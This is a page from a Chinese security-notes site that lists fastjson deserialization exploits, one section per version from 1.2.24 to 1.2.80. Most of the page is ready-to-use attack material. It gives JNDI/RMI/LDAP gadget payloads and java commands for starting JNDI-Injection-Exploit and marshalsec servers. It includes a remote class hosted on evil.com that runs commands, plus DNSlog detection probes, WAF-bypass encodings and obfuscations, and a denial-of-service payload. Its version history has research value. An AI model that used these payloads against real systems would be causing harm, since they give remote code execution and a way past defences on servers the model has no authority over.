网安
  • Develop
    • JAVA学习
      • 字节码
      • API开发
      • Web开发
      • 工程结构推荐
      • 创建第一个项目
      • 权限管控
      • 配置文件
      • 日志管理
      • 数据访问
      • 性能监控
      • IoC容器
      • Spring
      • Filter与Listener
      • jsp
      • MVC
      • servlet-1
      • servlet-2
      • servlet-3
      • servlet-4
      • FreeMarker
      • Thymeleaf
      • EL
      • SpEL
      • JSTL
      • 部署
      • JDBC
      • 数据库连接池
      • fastjson
      • jackson
      • XML
      • JSON
      • 序列化
      • Maven
      • 安装与使用
      • 工具
      • 爬虫
    • GO学习
      • GO
        • flag 包
        • goland 远程调试
        • GoReleaser
        • OS 包
        • time 包
        • 格式化输出
    • Lua学习
      • Lua
      • 基础语法
      • LuaJIT
      • 与系统交互
    • Pyhon
      • 基础
      • Django
      • CLI
      • miniforge
      • MockingBird
      • pdb
      • pyc
      • 装的我脑血栓要犯了
      • Python101
      • 反序列化
      • 爬虫
      • Pillow
      • 图像识别
      • flask
    • Speed-Ruby
      • 入门1
      • 入门2 对象
      • 入门3 创建命令
      • Encoding类
      • File类与Dir类
      • IO
      • Proc类
      • Time类与Date类
      • 正则
      • 错误处理与异常
      • 对象、变量和常量
      • 方法
      • 数值
      • 数组
      • 条件判断
      • 循环
      • 运算符
      • Socket编程
      • 字符串
      • 并发与线程
      • 块
      • 类和模块
      • 散列
    • Web
      • HTTP
        • Connection
        • HTTP 报文
        • Vary
      • 笔记
        • 跳转
        • 认证 & 授权
        • 同源策略(SOP)
        • 文件
    • Git 学习笔记
    • JSON
      • JSON 学习笔记
    • HTML
      • Speed-HTML
      • 语法学习
      • HTML字符实体
    • XML
      • XML 学习笔记
    • 计算机基础
      • 操作系统
      • 计算机组成
      • 算法
      • 内存
      • 字符编码
    • gnuplot 学习笔记
    • regex
  • Integrated
    • Linux
      • God-Linux
      • Secure-Linux
      • Power-Linux
      • IO模型
      • Speed-Linux
      • 发行版
      • 工具
      • 启动过程
      • 进程
      • 认证
      • 日志
      • 守护进程
      • 文件
      • 信息
      • VSFTP 配置案例
      • auditd
      • containerd
      • DNS 配置案例
      • Docker
      • Docker-Compose
      • firewalld 实验
      • gpg
      • Iptables
      • httpd
      • LAMP
      • mysql
      • nfs 配置案例
      • openssl
      • PAM
      • samba 配置案例
      • terraform
      • ufw
      • VSFTP 配置案例
    • Network
      • Speed-Net
      • Power-Net
      • SDN 笔记
      • DNS
      • TLS
    • Windows
      • Secure-Win
      • Speed-Win
      • ACL
      • LDAP
      • IPC$(Internet Process Connection)
      • PDB符号文件
      • 工作组
      • WinRM
      • 角色权限
      • 凭据
      • 签名
      • 日志
      • 认证
      • 协议
      • 信息
      • 应用
      • 组策略
      • 域
      • asp站点搭建
      • Exchange 搭建
      • Windows 故障转移集群
      • Windows 基础服务搭建
      • Windows 域搭建
      • 本地抓包
      • PowerShell 笔记
    • 容器
      • Docker
    • 数据库
      • Speed-SQL
      • Power-SQL
      • MSSQL
      • MySQL
      • Postgresql
      • Redis
      • MySQL大小写问题
      • 主键和外键
      • MySQL快速入门
      • 虚拟化
        • ESXi
        • vCenter
  • Plan
    • Mac-Plan
    • Misc-Plan
    • Team-Plan
    • Thinking-Plan
    • VM-Plan
  • Sercurity
    • Power-PenTest
    • BlueTeam
      • 安全建设
      • 分析
      • 加固
      • 取证
      • 应急
      • USB取证
      • 磁盘取证
      • 内存取证
      • ClamAV 部署
      • yara 实验
      • 安防设施搭建使用
      • ZIP明文攻击
      • 流量分析
    • Crypto
      • Crypto
        • 2020 9 G60攻防大赛
        • CTF
        • 2020 9 中能融合杯工控CTF
        • 2020 10 全国工业互联网安全技术技能大赛江苏省选拔赛
        • 2020 10 全国网络与信息安全管理职业技能大赛江苏场
        • 2020 11 I²S峰会暨工业互联网安全大赛
        • 2021 6 第二届I²S峰会暨工业互联网安全大赛
        • 2021-9-第七届工控信息安全攻防竞赛
        • 2021 9 第七届全国职工职业技能大赛某市县选拔赛
        • 2021 9 全国网络与信息安全管理职业技能大赛江苏场
        • 2021-10-G60攻防大赛
    • CTF
      • CTF
      • writeup
        • 2020 9 中能融合杯工控CTF
        • 2020 9 G60攻防大赛
        • 2020 10 全国工业互联网安全技术技能大赛江苏省选拔赛
        • 2020 10 全国网络与信息安全管理职业技能大赛江苏场
        • 2020 11 I²S峰会暨工业互联网安全大赛
        • 2021 6 第二届I²S峰会暨工业互联网安全大赛
        • 2021-9-第七届工控信息安全攻防竞赛
        • 2021 9 第七届全国职工职业技能大赛某市县选拔赛
        • 2021 9 全国网络与信息安全管理职业技能大赛江苏场
        • 2021-10-G60攻防大赛
    • ICS
      • PLC攻击
      • S7comm 相关
      • 工控协议
      • 上位机安全
      • Modbus 仿真环境搭建
      • siemens 仿真搭建实验
      • S7-300 启停实验
    • IOT
      • 无线电安全
        • RFID复制卡
        • RFID基础知识
        • WiFikiller
      • 硬件安全
        • DIY键盘嵌入指纹识别模块实验记录
        • Device-Exploits
        • HID-Digispark
        • HID-KeyboardLogger
        • HID-USBHarpoon
        • HID-USBKeyLogger
      • 固件安全
        • 固件安全
        • Dlink_DWR-932B 路由器固件分析
    • Mobile sec
      • 小程序安全
      • Android安全
    • PWN
      • SLMail溢出案例
      • PWN
    • Red Team
      • OS安全
        • Linux 安全
        • Exploits
        • NTLM中继
        • Windows 安全
        • Responder欺骗
        • Windows-LOL
      • Web_Generic
        • Top 10
          • RCE
          • Fileread
          • SQLi
          • SSRF
          • SSTI
          • Web Generic
          • XSS
          • XXE
      • Web_Tricks
        • JWT 安全
        • HTTP_request_smuggling
        • OOB
        • 绕过访问
      • 靶场
        • Hello-Java-Sec 学习
        • DVWA-WalkThrough
        • pikachu-WalkThrough
        • upload-labs-WalkThrough
        • XVWA-WalkThrough
        • XSS挑战-WalkThrough
      • 实验
        • flask
        • fastjson
        • Log4j
        • nodejs
        • Shiro
        • Spring
        • Weblogic
      • 前端攻防
      • IDOR
    • 安防设备
      • Exploits
      • Bypass 技巧
    • 后渗透
      • 权限提升
      • 后渗透
      • 权限维持
      • 实验
        • C2 实验
        • Exchange
        • 端口转发实验
        • 代理实验
        • 免杀实验
        • 隧道实验
    • 软件服务安全
      • Exploits
      • CS Exploits
      • 实验
        • Docker
        • Kubernetes
        • Mysql
        • Oracle
        • PostgreSQL
        • Redis
        • vCenter
    • 协议安全
      • Exploits
    • 信息收集
      • 端口安全
      • 空间测绘
      • 信息收集
    • 语言安全
      • 语言安全
        • 语言安全
      • GO安全
        • GO安全
        • Go代码审计
      • JAVA安全
        • JAVA安全
        • JAVA代码审计
        • JAVA反序列化
        • SpEL 注入
      • PHP安全
        • PHP安全
        • bypass_disable_function
        • bypass_open_basedir
        • phpinfo
        • PHP代码审计
        • PHP反序列化
        • PHP回调函数
        • 变量覆盖
        • POP
        • 弱类型
        • 伪协议
        • 无字母数字Webshell
      • Python安全
        • pyc反编译
        • Python安全
        • Python 代码审计
        • 沙箱逃逸
      • dotnet安全
      • JS安全
    • 云安全
      • 公有云安全
    • Reverse
      • Reverse
      • FILE
        • ELF
        • BMP
        • JPG
        • PE
        • PNG
        • ZIP
        • 文件头
      • 实验
        • PYAble
          • 2-逆运算
          • 1-基本分析
          • 3-异或
          • 4-Base64
          • 5-Base64换表
          • 6-动态调试
        • Windows
          • condrv.sys 内存损坏漏洞
    • 工具
      • Aircrack
      • BloodHound
      • Burp Suite
      • frp
      • CobaltStrike
      • Ghidra
      • fscan
      • Hashcat
      • IDA
      • merlin
      • Kali
      • Metasploit
      • Mimikatz
      • ModSecurity
      • Nmap
      • nps
      • nuclei
      • pupy
      • RedGuard
      • SET
      • sliver
      • Snort
      • Sqlmap
      • Suricata
      • Sysmon
      • uncover
      • Volatility
      • Wfuzz
      • Wireshark
      • xray
    • 安全资源
      • 靶机
        • VulnHub
          • DC
            • DC2 WalkThrough
            • DC1 WalkThrough
            • DC3 WalkThrough
            • DC4 WalkThrough
            • DC5 WalkThrough
            • DC6 WalkThrough
            • DC9 WalkThrough
            • DC8 WalkThrough
          • It's_October
            • It’s_October1 WalkThrough
          • Kioptrix
            • Kioptrix2 WalkThrough
            • Kioptrix3 WalkThrough
            • Kioptrix4 WalkThrough
            • Kioptrix5 WalkThrough
          • Mission-Pumpkin
            • PumpkinGarden-WalkThrough
            • PumpkinFestival WalkThrough
            • PumpkinRaising WalkThrough
          • Symfonos
            • symfonos1 WalkThrough
            • symfonos2 WalkThrough
            • symfonos3 WalkThrough
            • symfonos5 WalkThrough
        • Wargames
          • Bandit
            • Bandit-WalkThrough
      • 面试问题
        • 面试问题
Powered by GitBook
On this page
  • 免责声明
  • JNDI注入影响范围
  • 运行 JNDI 服务器命令
  • 探测
  • WAF 绕过方法
  • 结合Feature词法分析器进行混淆绕过
  • 利用 FastJson 智能匹配进行混淆绕过
  • 修改 Content-Type
  • fastjson<=1.2.24 (CNVD-2017-02833)
  • fastjson<=1.2.25
  • fastjson<=1.2.41
  • fastjson<=1.2.42
  • fastjson<=1.2.43
  • fastjson<=1.2.45
  • fastjson<=1.2.47 (CNVD-2019-22238)
  • fastjson<=1.2.59
  • fastjson<1.2.60 (Dos漏洞)
  • fastjson<=1.2.61
  • fastjson<=1.2.62
  • fastjson < 1.2.66
  • fastjson < 1.2.66 版本拒绝服务漏洞
  • fastjson<=1.2.68
  • AnterosDBCPConfig
  • JtaTransactionConfig
  • fastjson <= 1.2.80
  1. Sercurity
  2. Red Team
  3. 实验

fastjson

PreviousflaskNextLog4j

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


项目地址 : https://github.com/alibaba/fastjson

相关文章

相关工具

  • - fastjson rce 命令执行综合利用工具,一键操作,fastjson remote code execute poc

  • - fastjson漏洞快速利用框架

  • - scanner 扫描反编译生成的源文件

  • - a burp extension to find where use fastjson


JNDI注入影响范围

  1. 基于 rmi 的利用方式, 适用 jdk 版本:JDK 6u132、JDK 7u122、JDK 8u113 之前

  2. 基于 ldap 的利用方式, 适用 jdk 版本:JDK 11.0.1、8u191、7u201、6u211 之前


运行 JNDI 服务器命令

JNDI-Injection-Exploit

java -jar /pentest/JNDI-Injection-Exploit/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<payload>" -A <vps ip>
java -jar /pentest/JNDI-Injection-Exploit/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping xxxx.dnslog.cn" -A xx.xx.xx.xx

marshalsec

如果没有 com.sun.jndi.rmi.object.trustURLCodebase 的限制,我们可以简单利用 RMI 进行命令执行

首先编译并上传命令执行代码,如http://evil.com/runexec.class:

// javac runexec.java
import java.lang.Runtime;
import java.lang.Process;

public class runexec {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
javac runexec.java

启动一个 RMI 服务器,监听 9999 端口,并制定加载远程类 runexec.class

java -cp /pentest/marshalsec/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://xx.xx.xx.xx/#runexec" 9999

发送 payload ,指定 rmi 服务器即可


探测

相关文章

如何区分 fastjson 与 jackson

  1. 不闭合花括号看报错信息

  2. 减少参数

    {"name":"S", "age":21}              // Fastjson 是不会报错
    {"name":"S", "age":21,"xxx":123}    // Jackson 语法相对比较严格,会报错
  3. 报错关键词

    com.alibaba.fastjson.JSONException

    触发方式如下

    {"x":"
    ["x":1]
    {"x":{"@type":"java.lang.AutoCloseable"

java.net.Inet4Address

Content-Type: application/json

{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}

java.net.Inet6Address

Content-Type: application/json

{"@type":"java.net.Inet6Address","val":"xxx.dnslog.cn"}

java.net.InetSocketAddress

Content-Type: application/json

{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxx.dnslog.cn"}}

java.net.URL

Content-Type: application/json

{{"@type":"java.net.URL","val":"http://xxx.dnslog.cn"}:"x"}

一些畸形方式

Content-Type: application/json

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://xxx.dnslog.cn"}}""}
Set[{"@type":"java.net.URL","val":"http://xxx.dnslog.cn"}]
Set[{"@type":"java.net.URL","val":"http://xxx.dnslog.cn"}
{{"@type":"java.net.URL","val":"http://xxx.dnslog.cn"}:0
{{"@type":"java.net.URL","val":"http://xxx.dnslog.cn"}:"aaa"}

WAF 绕过方法

  • 加反斜杠特殊字符

  • Unicode/Hex 多重编码绕过

    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
    {"\u0040\u0074\u0079\u0070\u0065":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://localhost:1099/Exploit","\x61\x75\x74\x6f\x43\x6f\x6d\x6d\x69\x74":true}
  • 对关键词 (例如: @type) 做处理

    {"@\x74ype":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://xx.xx.xx.xx:3888"}
  • type 的变形

  • \b 绕过

    {"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}
  • 如果以上都不行, 就 fuzz 试试吧

结合Feature词法分析器进行混淆绕过

AllowSingleQuotes

AllowSingleQuotes 特性决定 parser 是否允许单引号来包住属性名称和字符串值。

可以使用单引号替代双引号,配合编码或者其他方式进行混淆绕过 waf 语义分析:

{'name':'test'}

AllowArbitraryCommas

AllowArbitraryCommas 特性允许多重逗号。那么可以在多个属性之间引入多个逗号,进行混淆:

{,,,,,,,,,,"name":"test",,,,,,,,"age":20}

AllowComment

AllowComment 该特性决定 parser 将是否允许解析使用 Java/C++ 样式的注释(包括'/'+'*' 和'//' 变量)。

可以通过插入相关的注释进行混淆,也可以构造超长数据包的方式进行 Bypass:

{"name":"test"/*hahahhah*/,"age":20}

利用 FastJson 智能匹配进行混淆绕过

FastJSON 存在智能匹配的特性,即使 JavaBean 中的字段和 JSON 中的 key 并不完全匹配,在一定程度上还是可以正常解析的。主要是在 JavaBeanDeserializer.smartMatch 方法进行实现。假设当前 UserBean 的属性如下,可以利用智能匹配的特性,可以尝试使用如下方法对 key 进行混淆:

private String name;
private Integer age;

使用-和_进行混淆

FastJSON 会对 JSON 中没有成功映射 JavaBean 的 key 做智能匹配,在反序列的过程中会忽略大小写和下划线,自动会把下划线命名的 Json 字符串转化到驼峰式命名的 Java 对象字段中。

使用 - 混淆字段名

{"@type":"com.sun.rowset.JdbcRowSetImpl","d-a-t-aSou-rc-eN-ame":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

使用 _ 混淆字段名

{"@type":"com.sun.rowset.JdbcRowSetImpl","d_a_t_aSou_rc_eN_ame":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

1.2.36 版本及后续版本还可以支持同时使用_和 - 进行组合混淆

{"n-a_m-e":"test","age":20}

可以以此作为依据进行简单的 fastjson 版本判断

使用 is 开头的 key 字段

Fastjson 在做智能匹配时,如果 key 以 is 开头, 则忽略 is 开头, 相关代码如下:

在原始 JavaBean 属性 age 和 name 基础上,在 JSON key 加入 is 仍可正常解析:

{"isname":"test","isage":20}

修改 Content-Type

某些 Waf 考虑到解析效率的问题,会根据 Content-Type 的内容进行针对性的拦截分析,例如值为 appliction/xml 时会进行 XXE 的检查,那么可以尝试将 Content-Type 设置为通配符 */* 来绕过相关的检查, 同理对 application/jsonContent-Type 的请求,也可以尝试将 Content-Type 设置为通配符 */* 来绕过相关的检查:


fastjson<=1.2.24 (CNVD-2017-02833)

相关文章

  • https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

描述

该漏洞在默认配置下即存在, 所以在 fastjson<=1.2.24 版本时, 该 poc 通杀

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

{"v24":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}}

官方于 2017/02/06 发布 1.2.25 版本修复该漏洞, 并增加了黑名单策略用来限制恶意类被反序列化.

此后, fastjson 的漏洞基本都是基于黑名单限制的绕过.


1.2.25 版本开始, 引入了 checkAutotype 安全机制 (白名单检测).

这也在极大程度上减小了之后几个版本基于黑名单绕过的 poc 的危害影响范围.


fastjson<=1.2.25

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":"data_source":"rmi://localhost:1099/Exploit"}}

{"@type":"[com.sun.rowset.RowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

fastjson<=1.2.41

描述

第一个 Fastjson 反序列化漏洞爆出后,fastjson在1.2.25版本设置了 autoTypeSupport 属性默认为 false,并且增加了checkAutoType() 函数,通过黑白名单的方式来防御 Fastjson 反序列化漏洞,因此后面发现的 Fastjson 反序列化漏洞都是针对黑名单的绕过来实现攻击利用的。 com.sun.rowset.JdbcRowSetImpl 在1.2.25版本被加入了黑名单,fastjson 有个判断条件判断类名是否以”L”开头、以”;”结尾,是的话就提取出其中的类名再加载进来,因此在原类名头部加L,尾部加;即可绕过黑名单的同时加载类。

autoTypeSupport 属性为 true 才能使用。(fastjson>=1.2.25 默认为 false)

fastjson<=1.2.41 版本, 且开启 autoType

ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

POC

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

{"v41":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

它与 1.2.24 版本 poc 唯一的不同之处是类名前后分别加上了 "L" 与 ";"

此时 com.sun.rowset.JdbcRowSetImpl 已经进了黑名单, 通过加上特殊字符, 绕过黑名单, 后续代码中会将 "L" 与 ";" 字符自动去除, 导致该恶意类被还原并被反序列化.

官方于 2017/12/12 发布 1.2.42 版本修复该绕过方式. (与黑名单进行比较之前就去除类名中的 "L" 与 ";")

fastjson1.2.42 版本起, fastjson 黑名单做了加密处理


fastjson<=1.2.42

描述

fastjson 在1.2.42版本新增了校验机制。

如果输入类名的开头和结尾是L和;就将头和尾去掉,再进行黑名单验证。 还把黑名单的内容进行了加密,防止安全人员进行研究,增加了研究的门槛。 但是有人已在Github上跑出了大部分黑名单包类:https://github.com/LeadroyaL/fastjson-blacklist 绕过方法,在类名外部嵌套2层L;。 原类名:com.sun.rowset.JdbcRowSetImpl 绕过: LLcom.sun.rowset.JdbcRowSetImpl;;

多重套用, 因为后续代码中的 "L" 与 ";" 字符去除判断方法会不断递归, 直至检测不到.

利用条件: fastjson<=1.2.42 版本, 且开启 autoType

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/Exploit", "autoCommit":true}

{"v42":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

{"@type":"LLcom.sun.rowset.RowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

官方于 2017/12/16 发布 1.2.43 版本修复该绕过方式


fastjson<=1.2.43

描述

fastjson 在 1.2.43 中 checkAutoType() 函数增加判断开头为 LL 直接报错。 绕过方法: 根据 fastjson 判断函数,[ 开头则提取类名,且后面字符字符为 [、{ 等,即可正常调用。

autoTypeSupport 属性为 true 才能使用。(fastjson>=1.2.25 默认为 false)

利用条件: 1.2.38<=fastjson<=1.2.43, 且开启 autoType

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/Exploit", "autoCommit":true}

{"v43":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://0.0.0.0","autoCommit":true]}}}

官方于 2017/12/21 发布 1.2.44 版本修复该绕过方式


fastjson<=1.2.45

描述

前提条件:需要目标服务端存在 mybatis 的 jar 包,且版本需为 3.x.x 系列 <3.5.0 的版本。 使用黑名单绕过,org.apache.ibatis.datasource 在1.2.46版本被加入了黑名单 由于在项目中使用的频率也较高,所以影响范围较大。

利用条件: fastjson<=1.2.45, 受限依赖于 ibatis, 但无需开启 autoType

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/Exploit"}}

{"v45":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"},"xxx":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://0.0.0.0"}}}

官方于 2018/02/05 发布 1.2.46 版本修复该绕过方式


fastjson<=1.2.47 (CNVD-2019-22238)

描述

autoType 为关闭状态也可使用。 loadClass 中默认 cache 设置为 true,利用分为2步执行,首先使用 java.lang.Class 把获取到的类缓存到 mapping 中,然后直接从缓存中获取到了 com.sun.rowset.JdbcRowSetImpl 这个类,绕过了黑名单机制。

无需开启 autoType, 在 fastjson<=1.2.47 版本时, 该 poc 通杀

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}

{"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

官方于 2018/03/25 发布 1.2.48 版本修复该绕过方式

相关文章

  • https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce

相关工具


fastjson<=1.2.59

利用条件: fastjson<=1.2.59, 且开启autoType

# 以下poc未复现成功
{"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://127.0.0.1"}}

{"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://127.0.0.1"}}

官方于 2019/09/05 发布 1.2.60 版本修复该绕过方式


fastjson<1.2.60 (Dos漏洞)

eyJhIjoiXHgaGiJ9

# base64解码后的数据发包,与正常请求相比,出现明显延迟即为存在漏洞

fastjson<=1.2.61

利用条件: fastjson<=1.2.61, 且开启 autoType

# 以下poc未复现成功

{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://127.0.0.1"}

{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://127.0.0.1","Object":"a"}

{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"}

官方于 2010/10/07 发布 1.2.62 版本修复该绕过方式


fastjson<=1.2.62

利用条件: fastjson<=1.2.62, 且开启 autoType

该 poc 来自于 jackson, 对应漏洞编号 CVE-2020-8840

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://0.0.0.0"}}

{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"rmi://localhost:1099/Exploit\"}
# 以下poc未复现成功
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://0.0.0.0"}}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://0.0.0.0"}

{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://0.0.0.0"},"namespace":""}

官方于2019/10/07发布1.2.63版本修复该绕过方式


fastjson < 1.2.66

利用条件: fastjson<=1.2.66, 且开启 autoType

{"v66":{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://0.0.0.0"],"Realms":[""]}}

{"v66":{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://0.0.0.0"}}
# 以下poc未复现成功

{"v66_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://0.0.0.0"}}

{"v66_error":{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://0.0.0.0"}}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://xx.xx.xx.xx:1389/Calc"}}

官方于2020/03/19发布1.2.67版本修复该绕过方式


1.2.67 版本及其之后的版本传递 JSON 格式 poc 不在需要参数名, poc 格式发生变化


fastjson < 1.2.66 版本拒绝服务漏洞

影响范围

  • 1.2.36 - 1.2.62

相关文章


fastjson<=1.2.68

描述

利用条件: fastjson<=1.2.68, 且开启 autoType

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"}

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"}

官方于 2020/06/01 发布 1.2.69 版本修复该绕过方式


AnterosDBCPConfig

{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"rmi://localhost:1099/Exploit\"}
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"rmi://localhost:1099/Exploit\"}

JtaTransactionConfig

{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\":{\"UserTransaction\":\"rmi://localhost:1099/Exploit\"}}

fastjson <= 1.2.80

相关文章

POC | Payload | exp

以下内容部分来自 [tkswifty 文章]

- fastjson 80 远程代码执行漏洞复现

Fastjson反序列化进攻利用
fastjson反序列化历史与检测
Fastjson探测简介
fastjson漏洞时间线
某json 绕墙的Tips
浅谈fastjson waf Bypass思路
fastjson的一些小学习
wyzxxz/fastjson_rce_tool
c0ny1/FastjsonExploit
Lonely-night/fastjson_gadgets_scanner
p1g3/Fastjson-Scanner
Maskhe/FastjsonScan
bigsizeme/fastjson-check
第18篇:fastjson反序列化漏洞区分版本号的方法总结
浅谈fastjson waf Bypass思路
【超详细】Fastjson1.2.24反序列化漏洞复现
Fastjson <=1.2.47 远程代码执行漏洞分析
fastjson =< 1.2.47 反序列化漏洞复现
CaijiOrz/fastjson-1.2.47-RCE
fastjson < 1.2.66 版本最新漏洞分析
Fastjson1.2.80漏洞复现
Lonely-night/fastjsonVul